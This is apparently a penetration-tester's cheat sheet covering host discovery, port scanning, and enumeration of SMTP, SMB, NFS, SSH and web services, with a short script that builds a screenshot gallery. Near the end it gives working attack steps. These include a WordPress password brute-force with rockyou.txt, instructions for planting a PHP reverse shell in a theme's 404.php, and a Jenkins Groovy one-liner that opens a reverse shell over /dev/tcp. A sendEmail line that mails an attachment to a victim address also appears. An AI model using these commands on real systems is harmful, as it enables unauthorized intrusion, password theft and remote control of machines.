sudo nmap --top-ports 50 <RANGE> --open -Pn -oA nmap_tcp_top50_hostdicovery
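# Hosts with at least one open port, taken from the greppable output of the
# scan above: -oA writes .nmap/.gnmap/.xml, so the bare basename is not a file.
# In the .gnmap file every "Host:" line carries the address in field 2 and the
# word "open" in its port list, so grep the file directly (no cat needed).
# `awk -f FILE` reads the program from a file and `sort u` sorts a file named
# "u" -- both were typos in the original one-liner.
grep -- open nmap_tcp_top50_hostdicovery.gnmap | awk '{print $2}' | sort -u > hosts.txt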
sudo nmap -sn <RANGE> -oA nmap_tcp_pingsweep
sudo netdiscover -r <RANGE>
sudo netdiscover -i <INTERFACE>
arp-scan -l
21: ftp
22: ssh
23: telnet
25: smtp
53: domain name system
80: http
110: pop3
111: rpcbind
135: msrpc
139: netbios-ssn
143: imap
443: https
445: microsoft-ds
993: imaps
995: pop3s
1723: pptp
3306: mysql
3389: ms-wbt-server
5900: vnc
8080: http-proxy
sudo nmap <TARGET> -sV -sC -O -p- -vv -oA fulltcp_<TARGET>
sudo nmap <TARGET> -sU -sV -sC -p- -vv -oA fulludp_<TARGET>
-Pn: No ping. Use if the host is reported as down but you know it is up.
-sn: No port scan. Use for a ping sweep.
If there is an open HTTP proxy, connect to it by configuring a proxy in your browser.
autorecon -vv <IP>
nmap <TARGET> -p- --script vuln -vv -oA vulnscan_<TARGET>
nc -nv <IP> 25
VRFY root
VRFY idontexist
nmap -p25 --script smtp-enum-users <IP>
nmap -p25 --script smtp-commands <IP>
nmap -p25 --script *smtp* <IP>
sendEmail -t <VICTIM MAIL> -f <SENDER MAIL> -s <MAILSERVER IP> -u <TITLE OF MAIL> -a <ATTACHED FILE PATH>
sudo python3 smbver.py <IP> <PORT>
nmap -p 139,445 --script=smb-enum-shares.nse,smb-enum-users.nse <IP>
nmap -p 139,445 --script=/usr/share/nmap/scripts/smb* <IP>
enum4linux <IP>
crackmapexec smb -u '' -p '' --shares
- Use -d <DOMAIN> if the account is a domain account.
crackmapexec smb -u '<USERNAME>' -p '<PASSWORD>' -d .
- If you have a username and password, fill in the "%" part.
smbclient -L <IP> -U ""%""
- If you have a username and password, fill in the "%" part.
smbclient //<IP>/<SHARE> -U ""%""
get <FILE NAME>
smbget -R smb://<IP>/<SHARE>
nbtscan <IP>
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <IP>
ssh <IP>
ssh <IP> -oKexAlgorithms=+<alg from error>
ssh <IP> -oKexAlgorithms=+<alg from error> -c <cipher from error>
- Check the file extensions in URLs to see what the application is running (.net, .aspx, .php, etc.)
- Inspect page content
- Check Firefox debugger for outdated javascript libraries
- Look for /robots.txt and /sitemap.xml
- If the web server is running HTTPS, check the certificate for a URL/hostname and add it to /etc/hosts
curl <WEBPAGE>
grep -o '[^/]*\.<DOMAIN>\.com' index.html | sort -u > subdomains.txt
Collect screenshots from a list of IPs
for ip in $(cat <IP FILE>); do cutycapt --url=$ip --out=$ip.png;done
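#!/bin/bash
# Bash script to examine the scan results through HTML: writes web.html in the
# current directory with one entry per *.png screenshot -- a "label:" line
# followed by an <IMG> tag, the same layout the original awk one-liner produced.
set -euo pipefail
shopt -s nullglob   # no screenshots -> empty gallery, not a literal "*.png" entry

#######################################
# Write the HTML gallery of screenshots found in the current directory.
# Arguments: $1 - output file (default: web.html)
# Outputs:   nothing on stdout; the gallery is written to $1
# Returns:   0 on success
#######################################
build_gallery() {
  local out=${1:-web.html}
  local png label
  {
    printf '%s\n' "<HTML><BODY><BR>"
    # Glob instead of parsing `ls`, so names with spaces survive.
    for png in *.png; do
      # The original ran `awk -F :` and printed field 1 as the caption, so the
      # caption is everything before the first ':'.  The IMG SRC is the whole
      # file name: the original's $1$2 concatenation silently dropped the ':'
      # and produced a broken link for names like host:port.png.
      label=${png%%:*}
      printf '%s:\n<BR><IMG SRC="%s" width=600><BR>\n' "$label" "$png"
    done
    printf '%s\n' "</BODY></HTML>"
  } > "$out"
}

build_gallery "$@"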
./EyeWitness -f urls.txt --web
nikto -host <URL> -output nikto-URL.txt
-R: disable recursive scanning
-p: set up a proxy (IP:PORT)
-X: append each word with these extensions
dirb <URL> /usr/share/dirb/wordlists/big.txt -o dirb-<URL>.txt
dirb <URL> /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o dirb-<URL>.txt
- Use the -b flag to blacklist status codes.
- Use the -x flag to add file extensions.
gobuster dir -w /opt/SecLists/Discovery/Web-Content/big.txt -u <URL> -o gobuster-<URL>.txt
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u <URL> -o gobuster-<URL>.txt
wpscan --url <URL>
wpscan --url <URL> --enumerate u
wpscan --url <URL> --usernames <USERNAME> --passwords /usr/share/wordlists/rockyou.txt --max-threads 50
- Login --> Appearance --> Theme editor --> 404.php
- gedit /usr/share/webshells/php/php-reverse-shell.php
- Paste in 404.php
- Start listener and go to an unexisting page in the browser
- After login go to /script
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
curl -v -X OPTIONS http://website/directory
# HTTP methods such as PUT and DELETE should not be enabled; report them as a finding if they are.